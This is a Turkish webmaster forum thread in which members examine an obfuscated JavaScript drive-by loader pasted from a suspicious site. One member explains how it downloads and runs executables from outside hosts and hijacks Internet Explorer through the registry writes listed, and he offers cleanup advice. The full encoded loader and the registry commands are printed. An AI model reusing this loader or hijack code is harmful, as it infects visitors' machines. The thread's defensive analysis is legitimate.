İyinet'e Hoşgeldiniz!

Türkiye'nin En Eski Webmaster Forum'una Hemen Kayıt Olun!

Kayıt Ol!

Bu site virüslümü ?

L

Loi

0
İyinet Üyesi
Katılım
13 Kasım 2006
Mesajlar
6,192
Reaction score
44
Konum
localhost
Ben java scriptden anlamam, eger viruslu ise bu sayfa bu mesaj okundugunda sayfanin sahibi kodlari silecektir o nedenle anlayanlar bu kodlari tercume edebilirmi?


<script language=javascript>
function dF(s){
var s1=unescape(s.substr(0,s.length-1));
var t='';
for(i=0;i<s1.length;i++)
t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));
document.write(unescape(t));
}
dF('%264Dtdsjqu%2631mbohvbhf%264E%2633kbwbtdsjqu%2633%264F%261Bepdvnfou/xsjuf%2639voftdbqf%2639%2638%26364D%263684%263674%263683%26367%3A%263681%263685%263631%26367D%263672%26367F%263678%263686%263672%263678%263676%26364E%263633%263667%263653%263664%263674%263683%26367%3A%263681%263685%263633%26364F%26361B%26367G%26367F%263631%263676%263683%263683%26367G%263683%263631%263683%263676%263684%263686%26367E%263676%263631%26367F%263676%263689%263685%26361B%263675%26367D%263631%26364E%263631%263633%263659%263685%263685%263681%26364B%26363G%26363G%263688%263688%263688%26363F%26367C%26367D%263672%263687%26368%3A%263676%26367E%26367%3A%26368B%26363F%26367G%263683%263678%26363G%263652%263675%263672%26367F%263672%26367D%26367%3A%26363F%263679%263685%263672%263633%26361B%263664%263676%263685%263631%263675%263677%263631%26364E%263631%263675%26367G%263674%263686%26367E%263676%26367F%263685%26363F%263674%263683%263676%263672%263685%263676%263656%26367D%263676%26367E%263676%26367F%263685%263639%263633%26367G%263673%26367B%263676%263674%263685%263633%26363%3A%26361B%263675%263677%26363F%263684%263676%263685%263652%263685%263685%263683%26367%3A%263673%263686%263685%263676%263631%263633%263674%26367D%263672%263684%263684%26367%3A%263675%263633%26363D%263631%263633%263674%26367D%263684%26367%3A%263675%26364B%263653%263655%26364%3A%263647%263654%263646%263646%263647%26363E%263647%263646%263652%263644%26363E%263642%263642%263655%263641%26363E%26364%3A%263649%263644%263652%26363E%263641%263641%263654%263641%263645%263657%263654%263643%26364%3A%263656%263644%263647%263633%26361B%263684%263685%263683%26364E%263633%26365E%26367%3A%263674%263683%26367G%263684%26367G%263677%263685%26363F%263669%26365E%26365D%263659%263665%263665%263661%263633%26361B%263664%263676%263685%263631%263689%263631%26364E%263631%263675%263677%26363F%263654%263683%263676%263672%263685%263676%26365G%263673%26367B%263676%263674%263685%263639%263684%263685%263683%26363D%263633%263633%26363%3A%26361B%263672%263642%26364E%263633%263652%263675%26367G%263633%26361B%263672%263643%26364E%263633%263675%263673%26363F%263633%26361B%263672%263644%26364E%263633%263664%263685%263683%263633%26361B%263672%263645%26364E%263633%263676%263672%26367E%263633%26361B%263684%263685%263683%263642%26364E%263672%263642%263637%263672%263643%263637%263672%263644%263637%263672%263645%26361B%263684%263685%263683%263646%26364E%263684%263685%263683%263642%26361B%263684%263676%263685%263631%263664%263631%26364E%263631%263675%263677%26363F%263674%263683%263676%263672%263685%263676%26367G%263673%26367B%263676%263674%263685%263639%263684%263685%263683%263646%26363D%263633%263633%26363%3A%26361B%263664%26363F%263685%26368%3A%263681%263676%263631%26364E%263631%263642%26361B%263684%263685%263683%263647%26364E%263633%263658%263656%263665%263633%26361B%263689%26363F%26365G%263681%263676%26367F%263631%263684%263685%263683%263647%26363D%263631%263675%26367D%26363D%263631%263657%263672%26367D%263684%263676%26361B%263689%26363F%263664%263676%26367F%263675%26361B%263677%26367F%263672%26367E%263676%263642%26364E%263633%26367F%263676%263688%26363F%263679%263685%263672%263633%26361B%263684%263676%263685%263631%263657%263631%26364E%263631%263675%263677%26363F%263674%263683%263676%263672%263685%263676%26367G%263673%26367B%263676%263674%263685%263639%263633%263664%263674%263683%26367%3A%263681%263685%26367%3A%26367F%263678%26363F%263657%26367%3A%26367D%263676%263664%26368%3A%263684%263685%263676%26367E%26365G%263673%26367B%263676%263674%263685%263633%26363D%263633%263633%26363%3A%26361B%263684%263676%263685%263631%263685%26367E%263681%263631%26364E%263631%263657%26363F%263658%263676%263685%263664%263681%263676%263674%26367%3A%263672%26367D%263657%26367G%26367D%263675%263676%263683%263639%263643%26363%3A%26361B%263677%26367F%263672%26367E%263676%263642%26364E%263631%263657%26363F%263653%263686%26367%3A%26367D%263675%263661%263672%263685%263679%263639%263685%26367E%263681%26363D%263677%26367F%263672%26367E%263676%263642%26363%3A%26361B%263664%26363F%26367G%263681%263676%26367F%26361B%263664%26363F%263688%263683%26367%3A%263685%263676%263631%263689%26363F%263683%263676%263684%263681%26367G%26367F%263684%263676%263653%26367G%263675%26368%3A%26361B%263664%26363F%263684%263672%263687%263676%263685%26367G%263677%26367%3A%26367D%263676%263631%263677%26367F%263672%26367E%263676%263642%26363D%263643%26361B%263664%26363F%263674%26367D%26367G%263684%263676%26361B%263684%263676%263685%263631%263662%263631%26364E%263631%263675%263677%26363F%263674%263683%263676%263672%263685%263676%26367G%263673%26367B%263676%263674%263685%263639%263633%263664%263679%263676%26367D%26367D%26363F%263652%263681%263681%26367D%26367%3A%263674%263672%263685%26367%3A%26367G%26367F%263633%26363D%263633%263633%26363%3A%26361B%263662%26363F%263664%263679%263676%26367D%26367D%263656%263689%263676%263674%263686%263685%263676%263631%263677%26367F%263672%26367E%263676%263642%26363D%263633%263633%26363D%263633%263633%26363D%263633%26367G%263681%263676%26367F%263633%26363D%263641%26361B%26364D%26363G%263684%263674%263683%26367%3A%263681%263685%26364F%2638%263%3A%263%3A%264C%261B%264D0tdsjqu%264F1');
</script>

<SCRIPT language=JavaScript>curPage=1;
document.oncontextmenu = function(){return false}
if(document.layers) {
window.captureEvents(Event.MOUSEDOWN);
window.onmousedown = function(e){
if(e.target==document)return false;
}
}
else {
document.onmousedown = function(){return false}
}</SCRIPT>
Genişletmek için tıkla ...
 
K

keyfinebak.com

0
İyinet Üyesi
Katılım
6 Kasım 2005
Mesajlar
2,564
Reaction score
0
Konum
Merkezden
siteye girenlerin pc'ye 3 adet mirc programı tarzında bişiler yüklüyor ve explorer sayfasını kitliyor. aynı şeyi banada yapmaya çalıştı ama defettim başımdan. Gerçi sonradan al elinden parasını yayınlama reklamı gibi düşündüm ama ondan bir farkım olmazdı. parasıda lazım değil kendide zihinsel özürlü mahlukat.

msn adresleri :

[email protected]
[email protected]

bu tarz beyinsiz mahlukatlardan uzak durmak gerekiyor.
 
L

Loi

0
İyinet Üyesi
Katılım
13 Kasım 2006
Mesajlar
6,192
Reaction score
44
Konum
localhost
Ben firefox kullanmaktayim ve bu tur seyler beni pek etkilemiyor. Tum webmasterlara siddetle oneriyorum FIREFOX kullanin. Ayrica keyfinebak.com unda belirttigi gibi icerisinde reklam kodlarinin bulunmadigi sizinde anlamadiginiz kodlarin bulundugu sayfalara iframe actirmayin. Bu tur reklamlar almayin..
 
K

keyfinebak.com

0
İyinet Üyesi
Katılım
6 Kasım 2005
Mesajlar
2,564
Reaction score
0
Konum
Merkezden
Loi' Alıntı:
Ben firefox kullanmaktayim ve bu tur seyler beni pek etkilemiyor. Tum webmasterlara siddetle oneriyorum FIREFOX kullanin. Ayrica keyfinebak.com unda belirttigi gibi icerisinde reklam kodlarinin bulunmadigi sizinde anlamadiginiz kodlarin bulundugu sayfalara iframe actirmayin. Bu tur reklamlar almayin..
Genişletmek için tıkla ...

Loi firefox konusunda sana katılıyorum ama işte sitelerimize gelen ziyaretçilerin çoğu explorer kullanıyor. kendimiz gibi onlarıda düşünmeliyiz. böle kendi çıkarında hareket eden bir zavallı yüzünden sitemiz ziyaretçilerini zor durumda bırakmamalıyız. ve dediğin gibi verdiği kod iframe içindeydi huylandım olaydan siteyi inceleme fırsatımda olmadı denemeyi yaptığımda bilgisayara 3 tane program vari bişi yüklenmiş ve explorer ana sayfasına bi siteyi eklemişti. yazık dedim bastım msnden engeli elemana.

yukarıdaki mail adreslerini kullanıyor, dikkatli olmakta fayda var.
 
I

iLgisiz

0
İyinet Üyesi
Katılım
10 Mayıs 2007
Mesajlar
183
Reaction score
0
Konum
Yurtdışı
keyfinebak.com' Alıntı:
siteye girenlerin pc'ye 3 adet mirc programı tarzında bişiler yüklüyor ve explorer sayfasını kitliyor. aynı şeyi banada yapmaya çalıştı ama defettim başımdan. Gerçi sonradan al elinden parasını yayınlama reklamı gibi düşündüm ama ondan bir farkım olmazdı. parasıda lazım değil kendide zihinsel özürlü mahlukat.

msn adresleri :

[email protected]
[email protected]

bu tarz beyinsiz mahlukatlardan uzak durmak gerekiyor.
Genişletmek için tıkla ...

evet onlar tam birer şerefsiz! zaten ilk nete girdiğimde tanıyorum irc serverlerda reklam atıyorlardı atabey tanır . forumda nicki var sanırım
 
L

Loi

0
İyinet Üyesi
Katılım
13 Kasım 2006
Mesajlar
6,192
Reaction score
44
Konum
localhost
Baglandigi IRC sunucularini buraya yazarsaniz IPleri kontrol eder datacenterlara hizmet vermelerini engelletebiliriz. Muhtemelen saldiri botuda yukleniyordur makinalara..
 
M

maiL

Misafir
banada gelmişti bir keresinde iframe ile kendi kodlarını yayınlamamı istedi.
daha kodları almadan anladım yamuk olduğunu site adresini istedim. girdim mircler yüklenmişti. böyle kendini cin oldum şeytan çarpıcam ayağına yatanlara uyuz oluyorum.
 
D

DincerAydogdu

0
İyinet Üyesi
Onaylı Üye
Katılım
15 Nisan 2005
Mesajlar
1,741
Reaction score
29
Konum
Live in .NET
Kötü amaçlarla kullanılmaması için kodun deşifre edilmiş halini buraya koymuyorum ama yaptıklarını ve bulaşmışsa ne yapılması gerektiğini anlatmaya çalışayım.

Sistem sayfaya internet explorer tarafından desteklenen vbscript basıyor. Bu script ile activex kullanarak http://www.klavyemiz.org adresinden yeni bir vbscript indiriyor ve bunu internet explorer temporary files içine new.hta ismiyle kaydediyor ve bu kaydettiği dosyaya çalışma emri veriyor. Çalıştığı zaman c:\windows\news.vbs ve c:\windows\cansu2.exe şeklinde iki dosya atıyor ve bunların içeriğine http://www.asigenclik.net/kelebek.exe adresinden aldığı datayı koyuyor. Nihayetinde bunları çalıştırıyor.

En son olarak alttaki register ayarlarını değiştiriyor.

shell.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\URL\Prefixes\\mirc","http://www.esenruzgar.net","REG_SZ"
shell.regwrite "HKLM\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"
shell.regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"
shell.regwrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "http://www.esenruzgar.net","REG_SZ"
shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "http://www.esenruzgar.net","REG_SZ"
shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\\Search Bar", "http://www.esenruzgar.net","REG_SZ"
shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\\Search Page", "http://www.esenruzgar.net","REG_SZ"
shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\\Local Page", "http://www.esenruzgar.net","REG_SZ"
shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "http://www.esenruzgar.net","REG_SZ"
shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Components\0\\Source", "http://www.esenruzgar.net","REG_SZ"
shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Components\0\\SubscribedURL", "http://www.esenruzgar.net","REG_SZ"

Tüm bu işlemler için http://www.klavyemiz.org, http://www.asigenclik.net ve http://www.esenruzgar.net adresleri kullanılıyor. Tabi ki indirdiği exe file’ları çalıştırmadım. O nedenle nereye ne yazdığını bilemiyorum. Ancak üstte geçen tüm dosyaları silerseniz muhtemelen bu dertten kurtulursunuz. Bu arada bu sadece kopya windowslarda ortaya çıkar. IE’nin bu açığı yeni yamalarla kapatıldı.

Bence bunlar ve benzerleri için şikayet edilebilecek bir merciye ulaşmak lazım. Böyle onursuzca ve alanen yapılan bir harekete tepkisiz kalmak olmaz.
 
Cevap yazmak için giriş yap yada kayıt ol.

Türkiye’nin ilk webmaster forum sitesi iyinet.com'da forum üyeleri tarafından yapılan tüm paylaşımlardan; Türk Ceza Kanunu’nun 20. Maddesinin, 5651 Sayılı Kanununun 4. maddesinin 2. fıkrasına göre, paylaşım yapan üyeler sorumludur.

Üst